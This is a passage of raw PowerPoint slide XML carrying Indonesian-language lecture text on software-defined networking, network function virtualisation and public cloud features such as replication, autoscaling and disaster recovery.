              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NFV) (redhat.com/id/ topics/virtualization/what-is-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nfv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan server. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>orkestrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</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138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419216758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Fitur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang minimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
